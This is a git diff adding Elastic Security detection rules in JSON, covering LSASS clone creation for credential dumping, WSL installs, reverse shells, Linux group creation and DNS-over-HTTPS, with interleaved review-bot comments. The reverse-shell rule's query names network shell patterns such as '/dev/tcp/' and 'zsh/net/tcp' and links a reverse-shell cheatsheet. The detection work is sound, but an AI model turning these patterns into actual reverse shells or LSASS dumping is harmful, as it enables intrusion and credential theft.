b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_106.json new file mode 100644 index 00000000000..48a3c113d79 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_106.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of an LSASS process clone via PssCaptureSnapShot where the parent process is the initial LSASS process instance. This may indicate an attempt to evade detection and dump LSASS memory for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential LSASS Clone Creation via PssCaptureSnapShot", + "query": "process where host.os.type == \"windows\" and event.code:\"4688\" and\n process.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\" and\n process.parent.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\"\n", + "references": [ + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://medium.com/@Achilles8284/the-birth-of-a-process-part-2-97c6fb9c42a2" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a16612dd-b30e-4d41-86a0-ebe70974ec00", + "setup": "## Setup\n\nThis is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "a16612dd-b30e-4d41-86a0-ebe70974ec00_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_6.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_6.json new file mode 100644 index 00000000000..3879cc54c22 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_6.json 
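Review bot: The `"index"` list includes `logs-system.*`, but `"related_integrations"` names only the `windows` package, so the `system` integration that produces those indices is not declared; add an entry for it or drop the pattern. The `"tags"` entry `"Data Source: Sysmon"` also contradicts the `"setup"` text, which says the rule is meant only for data sources emitting Windows Security event 4688, and the query filters on `event.code:"4688"`; Sysmon does not produce that event code, so the tag should name the Windows Security event log source instead.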
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects changes to the registry that indicates the install of a new Windows Subsystem for Linux distribution by name. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Subsystem for Linux Distribution Installed", + "note": "## Triage and analysis\n\n### Investigating Windows Subsystem for Linux Distribution Installed\n\nThe Windows Subsystem for Linux (WSL) lets developers install a Linux distribution (such as Ubuntu, OpenSUSE, Kali, Debian, Arch Linux, etc) and use Linux applications, utilities, and Bash command-line tools directly on Windows, unmodified, without the overhead of a traditional virtual machine or dualboot setup. Attackers may abuse WSL to avoid security protections on a Windows host and perform a wide range of attacks.\n\nThis rule identifies the installation of a new Windows Subsystem for Linux distribution via registry events.\n\n### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine which distribution was installed. Some distributions such as Kali Linux can facilitate the compromise of the environment.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate that the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. 
Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and the WSL distribution is homologated and approved in the environment.\n\n### Related Rules\n\n- Host Files System Changes via Windows Subsystem for Linux - e88d1fe9-b2f4-48d4-bace-a026dc745d4b\n- Execution via Windows Subsystem for Linux - db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd\n- Suspicious Execution via Windows Subsystem for Linux - 3e0eeb75-16e8-4f2f-9826-62461ca128b7\n- Windows Subsystem for Linux Enabled via Dism Utility - e2e0537d-7d8f-4910-a11d-559bcf61295a\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : \n (\"HK*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\",\n \"\\\\REGISTRY\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\")\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/wsl/wsl-config" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1699af0-8e1e-4ed0-8ec1-89783538a061", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + 
"type": "eql", + "version": 6 + }, + "id": "a1699af0-8e1e-4ed0-8ec1-89783538a061_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_7.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_7.json new file mode 100644 index 00000000000..235e4151f8e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_7.json 
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects changes to the registry that indicates the install of a new Windows Subsystem for Linux distribution by name. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Subsystem for Linux Distribution Installed", + "note": "## Triage and analysis\n\n### Investigating Windows Subsystem for Linux Distribution Installed\n\nThe Windows Subsystem for Linux (WSL) lets developers install a Linux distribution (such as Ubuntu, OpenSUSE, Kali, Debian, Arch Linux, etc) and use Linux applications, utilities, and Bash command-line tools directly on Windows, unmodified, without the overhead of a traditional virtual machine or dualboot setup. Attackers may abuse WSL to avoid security protections on a Windows host and perform a wide range of attacks.\n\nThis rule identifies the installation of a new Windows Subsystem for Linux distribution via registry events.\n\n### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine which distribution was installed. Some distributions such as Kali Linux can facilitate the compromise of the environment.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate that the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. 
Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and the WSL distribution is homologated and approved in the environment.\n\n### Related Rules\n\n- Host Files System Changes via Windows Subsystem for Linux - e88d1fe9-b2f4-48d4-bace-a026dc745d4b\n- Execution via Windows Subsystem for Linux - db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd\n- Suspicious Execution via Windows Subsystem for Linux - 3e0eeb75-16e8-4f2f-9826-62461ca128b7\n- Windows Subsystem for Linux Enabled via Dism Utility - e2e0537d-7d8f-4910-a11d-559bcf61295a\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : \n (\"HK*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\",\n \"\\\\REGISTRY\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\")\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/wsl/wsl-config" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1699af0-8e1e-4ed0-8ec1-89783538a061", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + 
"type": "eql", + "version": 7 + }, + "id": "a1699af0-8e1e-4ed0-8ec1-89783538a061_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a198fbbd-9413-45ec-a269-47ae4ccf59ce_3.json b/packages/security_detection_engine/kibana/security_rule/a198fbbd-9413-45ec-a269-47ae4ccf59ce_3.json new file mode 100644 index 00000000000..13efd71f65e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a198fbbd-9413-45ec-a269-47ae4ccf59ce_3.json 
@@ -0,0 +1,53 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule helps you test and practice using alerts with Elastic Security as you get set up. It\u2019s not a sign of threat activity.", + "enabled": false, + "false_positives": [ + "This rule is not looking for threat activity. Disable the rule if you're already familiar with alerts." + ], + "from": "now-30m", + "index": [ + "auditbeat-*", + "filebeat-*", + "logs-*", + "winlogbeat-*" + ], + "interval": "24h", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 1, + "name": "My First Rule", + "note": "This is a test alert.\n\nThis alert does not show threat activity. Elastic created this alert to help you understand how alerts work.\n\nFor normal rules, the Investigation Guide will help analysts investigate alerts.\n\nThis alert will show once every 24 hours for each host. It is safe to disable this rule.\n", + "query": "event.kind:event\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-rules.html" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a198fbbd-9413-45ec-a269-47ae4ccf59ce", + "severity": "low", + "tags": [ + "Use Case: Guided Onboarding" + ], + "threshold": { + "field": [ + "host.name" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 3 + }, + "id": "a198fbbd-9413-45ec-a269-47ae4ccf59ce_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_108.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_108.json new file mode 100644 index 00000000000..f397cb8f6a6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_108.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell Activity via Terminal", + "note": "## Triage and analysis\n\n### Investigating Potential Reverse Shell Activity via Terminal\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing. This activity is typically the result of vulnerability exploitation, malware infection, or penetration testing.\n\nThis rule identifies commands that are potentially related to reverse shell activities using shell applications.\n\n#### Possible investigation steps\n\n- Examine the command line and extract the target domain or IP address information.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name in (\"sh\", \"bash\", \"zsh\", \"dash\", \"zmodload\") and\n process.args : (\"*/dev/tcp/*\", \"*/dev/udp/*\", \"*zsh/net/tcp*\", \"*zsh/net/udp*\") and\n\n /* noisy FPs */\n not (process.parent.name : \"timeout\" and process.executable : \"/var/lib/docker/overlay*\") and\n not process.command_line : (\n \"*/dev/tcp/sirh_db/*\", \"*/dev/tcp/remoteiot.com/*\", \"*dev/tcp/elk.stag.one/*\", \"*dev/tcp/kafka/*\",\n \"*/dev/tcp/$0/$1*\", \"*/dev/tcp/127.*\", \"*/dev/udp/127.*\", \"*/dev/tcp/localhost/*\", \"*/dev/tcp/itom-vault/*\") and\n not process.parent.command_line : \"runc init\"\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", + "https://github.com/WangYihang/Reverse-Shell-Manager", + 
"https://www.netsparker.com/blog/web-security/understanding-reverse-shells/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856_108", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_4.json b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_4.json new file mode 100644 index 00000000000..82b9cdbc238 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_4.json 
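Review bot: The `not process.command_line` exclusion list in `query` embeds deployment-specific hostnames (`*/dev/tcp/sirh_db/*`, `*/dev/tcp/remoteiot.com/*`, `*dev/tcp/elk.stag.one/*`, `*/dev/tcp/itom-vault/*`) that read as tuning for individual environments rather than generic noise, and shipping them in a prebuilt rule silently removes that coverage everywhere else. Prefer keeping such suppressions in a rule exception list and limiting the in-rule `not` clause to the generic cases (`timeout`/Docker overlay parent, `runc init`, loopback targets). The `note` field's false positive section should then state that loopback and `runc` cases are excluded by design so analysts know the coverage boundary, e.g. `- Connections to 127.* or localhost and processes spawned by runc init are excluded from this rule by design.`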
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create a new group. Attackers may create new groups to establish persistence on a system.", + "from": "now-9m", + "index": [ + "logs-system.auth-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux Group Creation", + "note": "## Triage and analysis\n\n### Investigating Linux Group Creation\n\nThe `groupadd` and `addgroup` commands are used to create new user groups in Linux-based operating systems.\n\nAttackers may create new groups to maintain access to victim systems or escalate privileges by assigning a compromised account to a privileged group.\n\nThis rule identifies the usages of `groupadd` and `addgroup` to create new groups.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the group was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify if a user account was added to this group after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Group creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created group and, in case an account was added to this group, delete the account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "iam where host.os.type == \"linux\" and (event.type == \"group\" and event.type == \"creation\") and\nprocess.name in (\"groupadd\", \"addgroup\") and group.name != null\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f", + "setup": "## Setup\n\nThis rule requires data coming in from Filebeat.\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": 
"event.ingested", + "type": "eql", + "version": 4 + }, + "id": "a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_108.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_108.json new file mode 100644 index 00000000000..bbedecdec44 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_108.json 
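Review bot: The `note` investigation guide misspells `succesfully` in "Investigate whether the group was created succesfully"; it should read `successfully`. The `setup` text also pins one Filebeat link to `filebeat/8.11/filebeat-installation-configuration.html` while every other link in the same field uses `current`, so that one link will go stale as the docs version advances; `https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-installation-configuration.html` keeps the set consistent.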
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "DNS-over-HTTPS Enabled via Registry", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled\" and\n registry.data.strings : \"1\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode\" and\n registry.data.strings : \"secure\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\" and\n registry.data.strings : \"1\")\n", + "references": [ + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and 
default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a22a09c2-2162-4df0-a356-9aacbeb56a04_108", + "type": "security-rule" +} \ No newline at end of file diff --git 